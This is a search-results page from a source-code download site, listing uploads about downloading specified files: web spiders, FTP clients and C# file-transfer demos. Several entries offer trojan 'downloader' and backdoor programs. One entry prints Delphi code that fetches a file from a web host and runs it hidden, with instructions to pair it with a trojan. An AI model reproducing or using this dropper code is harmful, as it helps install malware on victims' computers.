Welcome![Sign In][Sign Up]
Location:
Search - 下载指定文件

Search list

[WinSock-NDIS实例51-多线程SPIDER

Description: 多线程SPIDER:本实例使用多线程技术实现了网络蜘蛛应用程序,可以自动搜索HTML页面并下载指定文件。-multithreading SPIDER : examples of the use of the multithreading technology to achieve a spider network applications, it will automatically search HTML pages and download a specific file.
Platform: | Size: 93707 | Author: zhu | Hits:

[Ftp ClientFTP2003

Description: 本程序是用于工作中自动下载指定文件,并对下载后的文件作一定的处理,支持断线续传,自动生成需要的目录和文件,可配置IP地址和相关参数。-this procedure is used to work automatically download specified file, and download the files for certain, Break Continuingly support, automatic generation of directories and files that can be configured IP address and the relevant parameters.
Platform: | Size: 15316 | Author: 赵国茂 | Hits:

[OtherDown

Description: 一个简单的下载者源代码! 能下载指定文件保存 运行 编译都可自行修改
Platform: | Size: 141890 | Author: 望里 | Hits:

[WinSock-NDISVB下载指定文件

Description: 利用VB编程从网上下载指定文件到本地硬盘的指定位置
Platform: | Size: 12432 | Author: hbal22@126.com | Hits:

[CSharpFileTrans

Description: 本程序是一个用C#编写的文件传输程序,分服务端和客户端。 服务端首先监听端口,等待客户端的连接请求,一旦连接成功,即把可供客户端下载的文件名称发给客户端,客户端接受到文件名称后,选择要下载的文件,并发给服务器。服务器根据客户端发送的文件名,选择指定的文件读取文件流,并把文件流内容赋值给网络流发送到客户端,客户端将接受到的网络流赋值给文件流,并保存到文件。 注意:在使用时,要在E盘下建立一个aa文件夹,将一些文件放入其中,以供演示。-this procedure is a C# prepared by the file transfer process-server and the client. First-service monitoring ports, waits for the client to connect to the request Once connected, which is available for download client name in the paper circulated to clients, customers termination papers by name, choose to download the document and sent to the server. Servers based on the client to send the file name, select a file to read the documentation flow, and stream content to the network flow assignment sent to the client, the client will talk to the network flow assignment to the paper flow, and the preservation of the document. Note : when used in the E-aa established a folder of documents Add which, for demonstration.
Platform: | Size: 66560 | Author: 李元吉 | Hits:

[Internet-Network实例51-多线程SPIDER

Description: 多线程SPIDER:本实例使用多线程技术实现了网络蜘蛛应用程序,可以自动搜索HTML页面并下载指定文件。-multithreading SPIDER : examples of the use of the multithreading technology to achieve a spider network applications, it will automatically search HTML pages and download a specific file.
Platform: | Size: 93184 | Author: zhu | Hits:

[Ftp ClientFTP2003

Description: 本程序是用于工作中自动下载指定文件,并对下载后的文件作一定的处理,支持断线续传,自动生成需要的目录和文件,可配置IP地址和相关参数。-this procedure is used to work automatically download specified file, and download the files for certain, Break Continuingly support, automatic generation of directories and files that can be configured IP address and the relevant parameters.
Platform: | Size: 15360 | Author: 赵国茂 | Hits:

[Internet-NetworkURLDownloadToFile

Description: 使用URLDownloadToFile下载文件(vc),下载指定地址的文件并后台执行,-URLDownloadToFile use downloaded documents (vc), Download designated address in the paper and the implementation of background,
Platform: | Size: 28672 | Author: 谭圣为 | Hits:

[Internet-NetworkAnalyzer

Description: 本例程演示了如何使用正则表达式解析HTML文件。本例程使用C#语言编写,可以下载指定网页并进行分析,将HTML文档结构以树状形式展现出来,并提供基于正则表达式的搜索功能,用户可以方便的筛选出网页上形式相似的内容。-the routine demonstration of how to use regular expressions are analytic HTML document. Routine use of the C# language, designated website can be downloaded and analyzed, HTML files in a tree structure of the form shown, and to provide regular expression is based on the search function, users can select a convenient form on the website similar to the content.
Platform: | Size: 262144 | Author: 徐子晨 | Hits:

[Internet-Networkmydown

Description: 执行后可以下载指定程序并执行 你先把大体积木马放到一固定FTP空间上 打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:) 用工具压一下,只有10K 这样说完是不行的,说一下代码: program wsdgsRoad uses URLMon, ShellApi var u,l: pchar {.$R *.res} function DownloadFile(SourceFile, DestFile: string): Boolean begin GetMem(u,100) GetMem(l,100) u:= http://www.jm-my.com/ip2.txt //改为你要下载的网址 l:= c:/downpage.txt //改为你要存放并打开文件的路径 try Result := UrlDownloadToFile(nil, PChar(u), PChar(l), 0, nil) = 0 except Result := False end end begin if DownloadFile(u, l) then begin ShellExecute(0, PChar( open ), PChar(l), PChar( ), nil, 0) end //freemem(u) //freemem(l) end. 先试一下。。。。 ok, 明白了吗 再见-after implementation can be downloaded designated procedures and implement your first Mass Trojans into a fixed space on the open FTP D elphi open down.dpr seen it change your build ok individual downloads : ) tool, pressure that is only 10K finish this is not enough, saying that what code : program uses URLMon wsdgsRoad, ShellApi var u, l : pchar (. $ R*. res) function DownloadFile (Sour ceFile, DestFile : string) : Boolean begin GetMem (u, 100) GetMem (l, 100) u : = http :// www.jm-my.com/ip2.txt// read you want to download the website l : = c :/downpage.txt// read your document storage and open the path to try Result : = UrlDownloadToFile (nil, PChar (u), PChar (l), 0, nil) = 0 except Result : = False end if end begin DownloadFile (u, l) then begin ShellExecute (0, PChar (open)
Platform: | Size: 1024 | Author: 韩冰 | Hits:

[OtherDown

Description: 一个简单的下载者源代码! 能下载指定文件保存 运行 编译都可自行修改-That those who download a simple source code! Can download the designated file is saved to run the compiler can make its own decisions
Platform: | Size: 141312 | Author: 望里 | Hits:

[Windows Developup

Description: 下载指定文件将安装程序所在路径下所有文件安装到指定目录等功能-MyUpdate
Platform: | Size: 40960 | Author: 行者 | Hits:

[Browser PluginsFireFox_Plugin.tar

Description: Firefox Plugin开发的简单实现,实现在Firefox中点击插件下载指定文件的功能。-Firefox Plugin development of a simple realization, the realization of plug-ins in Firefox, click the specified file download function.
Platform: | Size: 400384 | Author: zhengfy | Hits:

[CSharpScoket

Description: 本程序是一个用C#编写的文件传输程序,分服务端和客户端。 服务端首先监听端口,等待客户端的连接请求,一旦连接成功,即把可供客户端下载的文件名称发给客户端,客户端接受到文件名称后,选择要下载的文件,并发给服务器。服务器根据客户端发送的文件名,选择指定的文件读取文件流,并把文件流内容赋值给网络流发送到客 -This procedure is to use C# to prepare a file transfer program, sub-client and client services. First of all, monitor server ports, waiting for client connection requests, once the connection, that is for the client to download the file name sent to client, client termination by the file name, choose to download the file and sent to the server. Server in accordance with the client to send the file name, select the specified file stream to read the document and the contents of the document flow to the network flow assignment is sent to the customer
Platform: | Size: 4096 | Author: xiaoping | Hits:

[Otheryuancheng

Description: 后门程序中,浏览远程主机的文件系统,已经下载指定文件,数据结构的设计和多线程传输和下载注定它的延时小。程序分了客户端和服务器端。-Backdoor programs, browse the remote host' s file system, have downloaded the specified file, data structure design and multi-threaded transfer and download a small delay bound to it. Program were divided into client and server side.
Platform: | Size: 63488 | Author: 刘盲森 | Hits:

[Remote Controldownrun

Description: 从网站上下载指定文件并运行 VC++6.0 编译通过.-download file form web adn run it
Platform: | Size: 5201920 | Author: liu | Hits:

[Internet-Networkspider-zhizhu

Description: spider网络蜘蛛,通过网页的链接地址来寻找网页,自动搜索 HTML 页面并下载指定文件-spider web spider, the link through the web to find web pages, HTML pages automatically search and download the file specified
Platform: | Size: 2373632 | Author: chinagen | Hits:

[Internet-Networkzd

Description: 实现自动下载指定文件,并直接运行,很有用,值得收藏-Automatically downloads the specified file, and run directly useful, it is worth collecting! ! !
Platform: | Size: 1024 | Author: xx | Hits:

[Internet-NetworkCDownloadFtpFile

Description: 用ftp协议从ftp协议上下载指定文件。可以支持有用户名和密码的ftp服务器-Use the ftp protocol from the ftp protocol on the Download the the specified file. Can support the the ftp server of the useful user name and password of the
Platform: | Size: 3072 | Author: 王志远 | Hits:

[Internet-NetworkCDownloadFtpFile

Description: 用ftp协议从ftp协议上下载指定文件。可以支持有用户名和密码的ftp服务器-Use the ftp protocol from the ftp protocol on the Download the the specified file. Can support the the ftp server of the useful user name and password of the
Platform: | Size: 3072 | Author: hattens | Hits:
« 12 3 4 5 6 7 8 9 10 ... 16 »

CodeBus www.codebus.net